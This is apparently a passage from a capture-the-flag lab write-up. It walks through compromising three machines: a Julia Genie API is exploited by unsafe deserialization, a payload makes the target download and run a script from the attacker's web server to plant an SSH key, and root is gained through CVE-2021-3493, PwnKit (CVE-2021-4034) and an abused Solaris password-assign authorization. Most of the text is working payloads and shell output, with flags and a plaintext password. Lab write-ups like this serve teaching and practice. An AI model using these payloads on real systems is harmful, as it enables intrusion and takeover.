fatal: this operation must be run in a work tree
root@odyssey:/tmp/otros# git config --unset core.bare
root@odyssey:/tmp/otros# git status
On branch master
Changes to be committed:
(use "git restore --staged ..." to unstage)
deleted: README.md
 deleted: genie.service
deleted: run.ji
root@odyssey:/opt/git/gogs-repositories/elpenor#
There are 3 deleted files, which we can restore using git reset — hard
root@odyssey:/tmp/otros# git reset --hard
HEAD is now at 0512c32 Update 'README.md'
root@odyssey:/tmp/otros# ls -l
-rw-r--r-- 1 root root 170 Aug 30 04:02 genie.service
-rw-r--r-- 1 root root 311 Aug 30 04:02 README.md
-rw-r--r-- 1 root root 627 Aug 30 04:02 run.ji
root@odyssey:/tmp/otros#
Let’s start with the genie.service file which is simply a service that runs under the user
elpenor and simply executes the run.ji file with julia
root@odyssey:/tmp/otros# cat genie.service
[Unit]
Description= Julia API
After=network.target
[Service]
Type=simple
User=elpenor
ExecStart=/usr/bin/julia /opt/beta_api/run.ji
[Install]
WantedBy=multi-user.target
root@odyssey:/tmp/otros#
The run.ji file is something simple, it defines a web that receives a parameter f by POST to
the /key route, then decodes it from base64 and proceeds to deserialize it
root@odyssey:/tmp/otros# cat run.ji
using Genie
using Genie.Router, Genie.Renderer, Genie.Renderer.Html, Genie.Renderer.Json,
Genie.Requests, Base64, Serialization
route("/") do
return "Key API"
end
route("/key", method = POST) do
data = postpayload(:f)
io = IOBuffer()
iob64_decode = Base64DecodePipe(io)
write(io, data)
seekstart(io)
new_data = String(read(iob64_decode))
con = isfile("/tmp/f.txt")
if con == true
rm("/tmp/f.txt")
else
 "N"
end
open("/tmp/f.txt", "w") do io
write(io, new_data)
end;
Serialization.deserialize("/tmp/f.txt");
end
up(3000, "0.0.0.0", async=false)
root@odyssey:/tmp/otros#
Searching for vulnerabilities in Julia we found a deserialization attack, we took the poc and
we will use it to try to simply execute the id command

❯ ./julia
_
_ _ _(_)_ | Documentation: https://docs.julialang.org
(_) | (_) (_) |
_ _ _| |_ __ _ | Type "?" for help, "]?" for Pkg help.
| | | | | | |/ _` | |
| | |_| | | | (_| | | Version 1.1.1 (2019-05-16)
_/ |\__'_|_|_|\__'_| | Official https://julialang.org/ release
|__/ |
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`id`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m
String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
julia>
Once created we will send it to .11 which is the one that runs on port 3000 in the script that
we saw before, as parameter f we will send the data in base64 as shown in the code, as a
result we execute the command id as elpenor

❯ curl 192.168.21.11:3000/key -d "f=$(base64 -w0 poc.serialized_jl)"

uid=1000(elpenor) gid=1000(elpenor) groups=1000(elpenor)
Once created we will send it to .11 which is the one that runs on port 3000 in the script that
we saw before, as parameter f we will send the data in base64 as shown in the code, as a
result we execute the command id as elpenor
root@odyssey:~# cat index.html
mkdir /home/elpenor/.ssh
echo "ssh-ed25519
AAAAC3NzaC1lZDI1NTE5AAAAIOChqNfHuH3wAgahGKW0RarFeScPycw5i9gJsIjvDWWS
kali@kali" >> /home/elpenor/.ssh/authorized_keys
root@odyssey:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Now we create a payload with Julia that makes a request to the http server and saves the
content in the file called shell in the /tmp directory and we send it

❯ ./julia
_
_ _ _(_)_ | Documentation: https://docs.julialang.org
(_) | (_) (_) |
_ _ _| |_ __ _ | Type "?" for help, "]?" for Pkg help.
| | | | | | |/ _` | |
| | |_| | | | (_| | | Version 1.1.1 (2019-05-16)
_/ |\__'_|_|_|\__'_| | Official https://julialang.org/ release
|__/ |
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`curl 192.168.21.12 -o
/tmp/shell`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m
String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
julia>

❯ curl 192.168.21.11:3000/key -d "f=$(base64 -w0 poc.serialized_jl)"

By doing so we receive a request on the server that means it was downloaded

root@odyssey:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.21.11 - - "GET / HTTP/1.1" 200 -
Finally we create a payload that executes the /tmp/shell file with bash, we send it and when
it is interpreted it will save our ssh key as authorized

❯ ./julia
_
_ _ _(_)_ | Documentation: https://docs.julialang.org
(_) | (_) (_) |
_ _ _| |_ __ _ | Type "?" for help, "]?" for Pkg help.
| | | | | | |/ _` | |
| | |_| | | | (_| | | Version 1.1.1 (2019-05-16)
_/ |\__'_|_|_|\__'_| | Official https://julialang.org/ release
|__/ |
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`bash /tmp/shell`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m
String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
julia>
❯ curl 192.168.21.11:3000/key -d "f=$(base64 -w0 poc.serialized_jl)"

Since it has been interpreted and taking advantage of our key it is authorized we can
connect via ssh as elpenor without even providing a password

❯ ssh [email protected]
elpenor@dev01:~$ id
uid=1000(elpenor) gid=1000(elpenor) groups=1000(elpenor)
elpenor@dev01:~$ hostname -I
192.168.21.11 172.17.0.1
elpenor@dev01:~$ cat flag.txt
ODYSSEY{JUL14_d353R14L124710n}
elpenor@dev01:~$
Quantum foam
ODYSSEY{74k3_c4R3_0f_Y0uR_R4nCH}
Looking at the version of Linux we are on, we find Ubuntu 20.04 LTS which is vulnerable to
CVE-2021–3493 which takes advantage of the Linux kernel
elpenor@dev01:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.2 LTS
Release: 20.04
Codename: focal
elpenor@dev01:~$
Taking advantage of the fact that the machine has gcc, we compile the exploit and run it.
When we run it, we get a bash as the root user where we read the flag
elpenor@dev01:~$ gcc exploit.c -o exploit
elpenor@dev01:~$ ./exploit
bash-5.0# whoami
root
bash-5.0# hostname -I
192.168.21.11 172.17.0.1
bash-5.0# cat /root/flag.txt
ODYSSEY{74k3_c4R3_0f_Y0uR_R4nCH}
bash-5.0#
Planck Length
ODYSSEY{50LaR15_R8AC_ADM1n15tRAT10n}
In the /root directory of dev01 we find a directory called Solaris, which has a file called
logins.json that contains what look like credentials
root@dev01:~/Solaris# cat login.json
{
"username": "elpenor",
"password": "enRH+/<r5y48@yJ",
"scheme": "pam",
"preserve": true,
 "timeout": -1
}
root@dev01:~/Solaris#
When trying the credentials to the ssh service of the machine .13 which is the last machine
we have left, we get a shell as the user elpenor

❯ ssh [email protected]
([email protected]) Password: enRH+/<r5y48@yJ
elpenor@dev:~$ id
uid=100(elpenor) gid=10(staff)
elpenor@dev:~$
Solaris has a command that is auths which shows the authorizations that the user has,
curiously our current user has
solaris.passwd.assign
elpenor@dev:~$ auths
solaris.account.activate,solaris.admin.wusb.read,solaris.mail.mailq,solaris.network.autoconf.
read,solaris.passwd.assign
elpenor@dev:~$
This privilege allows us to change the password of any user, such asroot
elpenor@dev:~$ passwd root
New Password: password123#
Re-enter new Password: password123#
passwd: password successfully changed for root
elpenor@dev:~$
After changing the password to root we only have to execute a su and by providing the
password we become it, we can read the last flag flag
elpenor@dev:~$ su root
Password: password123#
root@dev:~# id
uid=0(root) gid=0(root)
root@dev:~# cat /root/flag.txt
ODYSSEY{50LaR15_R8AC_ADM1n15tRAT10n}
root@dev:~#
Extra
CVE-2021–4034 — root odyssey / root dev01
Alternatively, if on the first machine we search for suid privileges we see the already famous
pkexec, with a pwnkit exploit we can become root
asterisk@odyssey:~$ find / -perm -u+s 2>/dev/null | grep -v snap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/pkexec
/usr/bin/at
asterisk@odyssey:~$ ls -l /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
asterisk@odyssey:~$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
root
# hostname -I
192.168.21.12 172.17.0.1 10.1.148.128
# cat /root/flag.txt
ODYSSEY{W3_4LL_4r3_p4r7_Of_4_cluS73R}
#
Exactly the same thing happens on the dev01 machine which also has the pkexec suid
lpenor@dev01:~$ find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/mount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
elpenor@dev01:~$ ls -l /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
elpenor@dev01:~$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
root
# hostname -I
192.168.21.11 172.17.0.1
# cat /root/flag.txt
ODYSSEY{74k3_c4R3_0f_Y0uR_R4nCH}